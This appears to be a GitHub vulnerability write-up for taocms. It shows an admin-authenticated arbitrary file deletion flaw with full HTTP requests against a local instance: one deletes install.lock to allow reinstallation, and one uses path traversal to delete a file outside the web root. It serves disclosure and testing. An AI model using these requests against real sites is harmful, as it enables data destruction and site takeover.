Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

taocms arbitrary file deletion vulnerability

attack condition: Requires login management

  1. open taocms/include/Model/File.php, found delete file code. The requested url is admin.php?action=file&ctrl=del&path=, receive parameter path.

image

image

  1. When taocms is installed, the install.lock file will be generated in the data directory

image

  1. At this point, when I visit install.php, it reminds me that it is already installed

image

  1. As requested below, I want to delete the install.lock file
GET /admin/admin.php?action=file&ctrl=del&path=/data/install.lock HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
  1. Surprisingly it can be removed successfully

image

  1. I visit install.php again, glad, taocms allows reinstallation

image

  1. Also, create a new test.txt file in your own user directory

image

  1. When I execute delete payload,test.txt is deleted
GET /admin/admin.php?action=file&ctrl=del&path=/../../../test.txt HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

image